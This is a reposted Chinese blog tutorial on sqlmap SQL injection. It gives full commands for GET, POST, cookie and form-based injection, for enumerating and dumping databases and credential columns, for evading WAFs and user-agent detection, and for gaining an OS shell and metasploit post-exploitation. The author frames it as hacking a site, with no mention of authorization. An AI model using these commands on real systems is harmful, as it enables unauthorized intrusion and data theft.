碼上快樂

相關內容    簡體    繁體

sqlmap注入分類

本文轉載自   查看原文   2018-02-28 11:08   1132    language:SQL

注入分法不同,種類不同,來個簡單的分類:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” 
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
3.cookie類注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2
好,區分完畢再來后續的
需要數據庫好:–dbs
得到數據庫名稱xxx,需要表: -D xxx –tables
得到表名xxxx,需要段:-D xxx -T xxxx –columns
得到段內有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump
那么我們來理解一下,-D -T -C 是干嗎的,當然就是知道其名稱,指定使用其。
–dbs –tables –columns 是干嗎的,當然就是不知道名稱,列出來唄
–dump 那自然就是字面意思,類似於導出數據的行為
其實注入有了上面這幾個命令,妥妥的夠用了,不過還需要繞waf –tamper=”"
注入被識別出來是工具,斷開咋辦–user-agent=”"
再多牛逼的功能都是慢慢積累出來的,別想一口吃成胖子

好,跑數據庫就是這么簡單,於是呢來一個稍微有點干貨的例子:
http://www.xxx.com/login.asp有post注入,我想日了,但是我不想出去拷貝post數據,很麻煩,我想讓sqlmap自動跑post注入
sqlmap -u “http://www.xxx.com/login.asp” –forms
很好,上面的命令成功的幫我跑了post注入,並且找到了post的注入點jjj=123
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs
於是我用上面的命令看看數據庫
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba
順便看看當前用戶是不是dba
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a 
用了上面的命令 -a能得到什么呢:自己去看幫助吧。
幫你篩選了一下,-a下面的那些命令是用來看用戶,看主機,看權限的。
后來呢,我發現權限還是挺高的,同時呢,我跑出來了數據庫名稱kkk
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables
同時我找到了網站路徑,然后我就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以執行系統命令,同時還發現了牛逼的xpcmdshell –os-shell
以及很多牛逼的文件操作命令–file-xx 這些命令在需要用的時候使用就是了,會給你帶來意想不到的驚喜
與此同時,我發現tables里面沒有我想要的東西,我也找不到合適的內容,咋辦呢,心一橫,我決定把所有的數據庫內容跑出來自己找,於是我這么做:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all
然后牛逼的sqlmap就開始跑啊跑,然后緊接着我的蛋就碎了,尼瑪,sqlmap一會就問你一次要不要破解密碼,要不要這個,要不要那個,我和我的小朋友們都想擦你妹夫,功夫不負有心人,我又看見了一個命令 –batch 可以自動選擇sqlmap默認選項
於是,我可以和我的小朋友們玩耍去了,再也不用看着sqlmap拖庫了。

總結下來,幫助文檔還是很重要的,多看看,總會有些收獲:
為了避免各位看英文看到吐,大概總結下:
Target: 字面意思,目標,那么就是確定目標的
Request: 字面意思,請求,就是定義請求內容的,比如post數據,http頭,cookie注入,http頭污染等等
Optimization:字面意思,調節性能,等等
Injection: 字面意思,注入的設置內容基本在這里,比如指定注入點,指定db,指定系統,等等
Detection:
基本就是用在確認注入范圍,尋找注入點區域,這些
Technique:
基本用在確定注入手段,以及攻擊方式
Fingerprint:
基本用在指紋識別,用的很少
Enumeration:
枚舉信息,主要用在注入中,很重要,很常用
Brute force:
用來爆破,其實主要是枚舉tables columns用的
User-defined function injection:
現在只有udf提權,以及指定一些自己定義的sqlmap腳本用,高端使用,求大牛指點
File system access
主要是文件讀取,文件寫入
Operating system access 
主要用在對系統操作,例如os-shell 以及 后續的連接metasploit 實現后滲透攻擊
windows registry access
基本就是注冊表操作了
General
字面意思,綜合的內容,一些特殊的功能實現,我在這里找到了crawl batch這些非常好用的參數
Miscellaneous


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 SQLmap的cookie注入測試 sqlmap注入實例 SQL注入之sqlmap進階2 SQLMAP自動注入(一) SQL注入之SQLmap入門 利用sqlmap注入測試 SqlMap檢測注入點 SQL注入:Sqlmap初體驗 sql注入工具:sqlmap命令 sqlmap指定位置注入
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM